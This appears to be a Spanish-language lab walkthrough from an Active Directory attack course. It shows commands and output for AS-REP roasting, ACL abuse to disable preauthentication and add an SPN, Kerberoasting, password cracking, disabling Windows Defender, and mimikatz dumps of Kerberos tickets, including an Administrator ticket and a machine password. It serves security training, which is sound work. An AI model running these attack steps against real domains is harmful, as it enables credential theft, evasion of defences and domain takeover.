Learning Objective - 15
AS-REP
Enumerando cuentas con preautenticacion de kerberos desactivada.
PS C:\AD\Tools> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth | select UserPrincipalName
UserPrincipalName
-----------------
VPN721user
VPN722user
VPN723user
VPN724user
VPN725user
VPN726user
VPN727user
VPN728user
VPN729user
VPN730user
VPN731user
VPN732user
VPN733user
VPN734user
VPN735user
VPN736user
VPN737user
VPN738user
VPN739user
VPN740user
Ahora, listamos los permisos para RDP Users.
PS C:\ad\tools> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
ObjectDN : CN=Control721User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : CN=Control722User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : CN=Control723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : CN=Control724User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
....
....
....
....Podemos verlo tambien en el bloodhound:
Deshabilitamos la preautenticacion para el usuario control723user.
PS C:\ad\tools> Set-DomainObject -Identity Control723User -XOR @{useraccountcontrol=4194304} -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=Control723User)(name=Control723User)(displayname=Control723User)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(|(samAccountName=Control723User)(name=Control723User)(displayname=Control723User))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because [System.DirectoryServices.SearchResult]
does not contain a method named 'dispose'.
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'Control723user'Ahora, volvemos a listar los usuarion con preautenticacion de kerberos desactivada.
PS C:\AD\Tools> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth | select UserPrincipalName
UserPrincipalName
-----------------
Control723user
VPN721user
VPN722user
VPN723user
VPN724user
VPN725user
VPN726user
VPN727user
VPN728user
VPN729user
VPN730user
VPN731user
VPN732user
VPN733user
VPN734user
VPN735user
VPN736user
VPN737user
VPN738user
VPN739user
VPN740user
Obteniendo el hash de un usuario sin pre autenticacion.
PS C:\ad\tools\ASREPRoast-master> Import-Module .\ASREPRoast.ps1
PS C:\ad\tools\ASREPRoast-master> Get-ASREPHash -UserName VPN723user -Verbose
VERBOSE: [Get-ASREPHash] DC server IP '172.16.2.1' resolved from current domain
VERBOSE: [Get-ASREPHash] Bytes sent to '172.16.2.1': 196
VERBOSE: [Get-ASREPHash] Bytes received from '172.16.2.1': 1626
$krb5asrep$VPN723user@dollarcorp.moneycorp.local:5be0f46fcdb51fbbee27cdaa15372656$cf9c690ff12bd7c52410ebd84f49488a9073a48c0d6f40833f962a120c63c7edda12f43569de673cb759164ef3153dbb26539d561abafb6ef13ac19b5fb60c69c0f290fc201ca3730d6e076fff79875f7d9fe84ae2ea66daf26c064409cd1a59303194678e4d91e7da854e3d17f43418590d44ab9da251f76c28ed9108f5a70d815849a59132e10ba06046114e144d4a154469a4d40cc549bde5aa0320a36f905309409e93f05231ca5bed421ce87fcb41d94a1d4649392f30614ecdebfe9c480a5c3173952b9176fcfe7cf75c952c24c3ea95717bdcd00163b2e02b8d20066dd21b57459d637e06dc40e3814f62764c31227fd1f1105e36982ead2cd854ed4fe189f312b5b793b1Obteniendo los hashes de todos los usuarios:
PS C:\ad\tools\ASREPRoast-master> Invoke-ASREPRoast
SamaccountName DistinguishedName Hash
-------------- ----------------- ----
Control723user CN=Control723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$Control723user@dollarcorp.moneycorp.local:e7958a9f...
VPN721user CN=VPN721User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN721user@dollarcorp.moneycorp.local:0ecfa7441359...
VPN722user CN=VPN722User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN722user@dollarcorp.moneycorp.local:7246b9a1a086...
VPN723user CN=VPN723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN723user@dollarcorp.moneycorp.local:1e73bfda62e3...
VPN724user CN=VPN724User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN724user@dollarcorp.moneycorp.local:2119c7a152be...
VPN725user CN=VPN725User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN725user@dollarcorp.moneycorp.local:006acf8b2c92...
VPN726user CN=VPN726User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN726user@dollarcorp.moneycorp.local:94053359d939...
VPN727user CN=VPN727User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN727user@dollarcorp.moneycorp.local:7597bf823904...
VPN728user CN=VPN728User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN728user@dollarcorp.moneycorp.local:517606b875b8...
VPN729user CN=VPN729User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN729user@dollarcorp.moneycorp.local:df2edb24eefe...
VPN730user CN=VPN730User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN730user@dollarcorp.moneycorp.local:82d6003c3fe5...
VPN731user CN=VPN731User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN731user@dollarcorp.moneycorp.local:6b20b7aa0f04...
VPN732user CN=VPN732User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN732user@dollarcorp.moneycorp.local:ea9560f2e5f1...
VPN733user CN=VPN733User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN733user@dollarcorp.moneycorp.local:b0304697d651...
VPN734user CN=VPN734User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN734user@dollarcorp.moneycorp.local:cebe3bfee8db...
VPN735user CN=VPN735User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN735user@dollarcorp.moneycorp.local:0302a1a92c85...
VPN736user CN=VPN736User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN736user@dollarcorp.moneycorp.local:e10bff8d4fa5...
VPN737user CN=VPN737User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN737user@dollarcorp.moneycorp.local:3bc64277460f...
VPN738user CN=VPN738User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN738user@dollarcorp.moneycorp.local:cd344245b71e...
VPN739user CN=VPN739User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN739user@dollarcorp.moneycorp.local:6e2baf56503b...
VPN740user CN=VPN740User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local $krb5asrep$VPN740user@dollarcorp.moneycorp.local:27d73ab48bc5...
Obtenemos el hash del usuario Control723User
PS C:\ad\tools\ASREPRoast-master> Get-ASREPHash -UserName Control723User -Verbose
VERBOSE: [Get-ASREPHash] DC server IP '172.16.2.1' resolved from current domain
VERBOSE: [Get-ASREPHash] Bytes sent to '172.16.2.1': 200
VERBOSE: [Get-ASREPHash] Bytes received from '172.16.2.1': 1674
$krb5asrep$Control723User@dollarcorp.moneycorp.local:0d7b274e6bd6ed841f73c8b26f19ba01$cf509b565cfb52ec8243933b1f20c506ba17ed070c755acba74ebee4419d182fc71ad0bd331a4ee3309ce9120ba625c3e65585769c64908b058df12fb7cd69db64d7643b6bfc3dbf5f81ed26be3050b21f1da6c834c9935122e72e3e62bb7ba23388be8220999d969d09c235c0d8f2f30aedf08282d68c7acec96b1abf874d3aa174b7873e739e8b3029d6e310c956ff278f7588b9e07304249f055f56db3de3a9d0e167b360d3000aa2da926fcbcf59346ebc6145a8a1fbd4000987ebe9fa01603e0e5dc287d355a3ad105ee80c123f3de4565505daf05fc45ddb348139a7e76e80410efcaefdedb02ecac50e76321fd3688f50f4b215d237db929c894e85e0a4b650a7f9434744Procedemos a crackearlo.
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-03-01 11:03) 0g/s 181981p/s 181981c/s 181981C/s fffff1..eyphed
Session completedAunque... no lo crackeo :c
SET SPN
Enumeramos los permisos que tiene el grupo RDPUsers mediante ACLS.
ObjectDN : CN=Control723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : CN=Support723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
Verificando si el usuario tiene SPN registrados.
PS C:\ad\tools\ASREPRoast-master> Get-DomainUser -Identity support723user | select serviceprincipalname
serviceprincipalname
--------------------
Agregando un SPN a un usuario que tengamos permisos.
PS C:\ad\tools\ASREPRoast-master> Set-DomainObject -Identity support723user -Set @{serviceprincipalname='dcorp/servicito'}Luego validamos si el servicio se agrego correctamente.
PS C:\ad\tools\ASREPRoast-master> Get-DomainUser -Identity support723user | select serviceprincipalname
serviceprincipalname
--------------------
dcorp/servicito
Luego, dumpeamos los hashes de los usuarios kerberoasteables y crackeamos de nuevo.
PS C:\ad\tools> .\Rubeus.exe kerberoast /outfile:targetedhashes.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 3
[*] SamAccountName : websvc
[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\ad\tools\targetedhashes.txt
[*] SamAccountName : svcadmin
[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\ad\tools\targetedhashes.txt
[*] SamAccountName : Support723user
[*] DistinguishedName : CN=Support723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : dcorp/servicito
[*] PwdLastSet : 2/19/2024 11:51:15 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\ad\tools\targetedhashes.txt
Podemos ver que figura nuestro servicio agregado con su user correspondiente.
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Support@123 (?)
1g 0:00:00:00 DONE (2024-03-02 12:43) 17.54g/s 175596p/s 301350c/s 301350C/s fffff1..eyphed
Use the "--show" option to display all of the cracked passwords reliably
Session completedLuego validamos que las credenciales sean correctas:
$crackmapexec smb 172.16.2.1 -u support723user -p 'Support@123'
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\support723user:Support@123
Delegacion de Kerberos
Unconstrained Delegation
Listando las pcs con delegacion.
PS C:\AD\Tools> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
DistinguishedName : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName : dcorp-dc.dollarcorp.moneycorp.local
Enabled : True
Name : DCORP-DC
ObjectClass : computer
ObjectGUID : d698b7ab-f29e-461b-9bc9-24a4a131c92d
SamAccountName : DCORP-DC$
SID : S-1-5-21-719815819-3726368948-3917688648-1000
UserPrincipalName :
DistinguishedName : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName : dcorp-appsrv.dollarcorp.moneycorp.local
Enabled : True
Name : DCORP-APPSRV
ObjectClass : computer
ObjectGUID : ca78344a-f7ac-4888-a371-10933b0e4b80
SamAccountName : DCORP-APPSRV$
SID : S-1-5-21-719815819-3726368948-3917688648-1106
UserPrincipalName :
Con las credenciales antes usadas, vamos a verificar cual de nuestras cuentas tiene accesos como localadmin en DCORP-APPSRV.
Probamos con el usuario websvc.
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>runas /user:dcorp\websvc powershell.exe
Enter the password for dcorp\websvc:
Attempting to start powershell.exe as user "dcorp\websvc" ...
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\ad\Tools> Find-PSRemotingLocalAdminAccess
PS C:\ad\Tools>Y ahora con el otro usuario appadmin.
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>runas /user:dcorp\appadmin powershell.exe
Enter the password for dcorp\appadmin:
Attempting to start powershell.exe as user "dcorp\appadmin" ...
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-adminsrv
dcorp-appsrv
PS C:\ad\Tools>Movemos en InvokeMimikatz y el rubeus al computador.
PS C:\AD\Tools> cp .\Invoke-Mimikatz.ps1 \\dcorp-appsrv\C$\
PS C:\AD\Tools> cp .\Rubeus.exe \\dcorp-appsrv\C$\Accedemos a la maquina con nuestra sesion.
PS C:\AD\Tools> winrs -r:dcorp-appsrv cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\appadmin>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\appadmin>
Luego ejecutamos mimikatz para extraer los tickets, tambien desactivamos el defender para no tener problemas.
PS C:\> Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIOAVProtection $true
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\> . .\Invoke-Mimikatz.ps1
. .\Invoke-Mimikatz.ps1
PS C:\> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::tickets /export
Authentication Id : 0 ; 5652157 (00000000:00563ebd)
Session : Network from 0
User Name : appadmin
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:25:47 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;563ebd]-2-0-60a10000-appadmin@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5641528 (00000000:00561538)
Session : Network from 0
User Name : appadmin
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:23:14 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;561538]-2-0-60a10000-appadmin@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-APPSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:31:00 PM
SID : S-1-5-20
* Username : dcorp-appsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 3/2/2024 3:25:29 PM ; 3/3/2024 1:10:28 AM ; 3/9/2024 5:35:48 AM
Service Name (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
a7c2e48b643ac95ad353b6f31bf15acf02b1d84e1f91ac78a5bc37c44993640e
Ticket : 0x00000012 - aes256_hmac ; kvno = 13 [...]
* Saved to file [0;3e4]-0-0-40a50000-DCORP-APPSRV$@cifs-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
[00000001]
Start/End/MaxRenew: 3/2/2024 5:35:48 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
Service Name (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
93db569b86742fbcb7fddd6f4e0b5c193638fbfcbc9560c8a41d96f2eeddf1b7
Ticket : 0x00000012 - aes256_hmac ; kvno = 13 [...]
* Saved to file [0;3e4]-0-1-40a50000-DCORP-APPSRV$@ldap-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:10:28 PM ; 3/3/2024 1:10:28 AM ; 3/9/2024 5:35:48 AM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( $$Delegation Ticket$$ )
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
c875601e2be22cfd01061d30a6d3a7de5b839b8260f29ac8427c37bc44e4b0e5
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e4]-2-0-60a10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
[00000001]
Start/End/MaxRenew: 3/2/2024 3:10:28 PM ; 3/3/2024 1:10:28 AM ; 3/9/2024 5:35:48 AM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
efc4444b9ff18075eea505f16453c9d6f6d8161f4e5f32140cc06feadb6546b6
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e4]-2-1-40e10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 21117 (00000000:0000527d)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:31:00 PM
SID : S-1-5-96-0-0
* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19un%6QdFsVpR@Pc[xv$W&=< V
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 21023 (00000000:0000521f)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:31:00 PM
SID : S-1-5-96-0-1
* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19un%6QdFsVpR@Pc[xv$W&=< V
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 5809266 (00000000:0058a472)
Session : Network from 0
User Name : appadmin
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:29:12 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;58a472]-2-0-60a10000-appadmin@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5809242 (00000000:0058a45a)
Session : Network from 0
User Name : Administrator
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:29:12 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:29:12 PM ; 3/3/2024 1:29:12 AM ; 3/9/2024 3:29:12 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
5d81ddd480eec98e1484c31688e6bd12765f8a48a46d677487b383c8ac09744e
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;58a45a]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5805266 (00000000:005894d2)
Session : Network from 0
User Name : Administrator
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:28:12 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
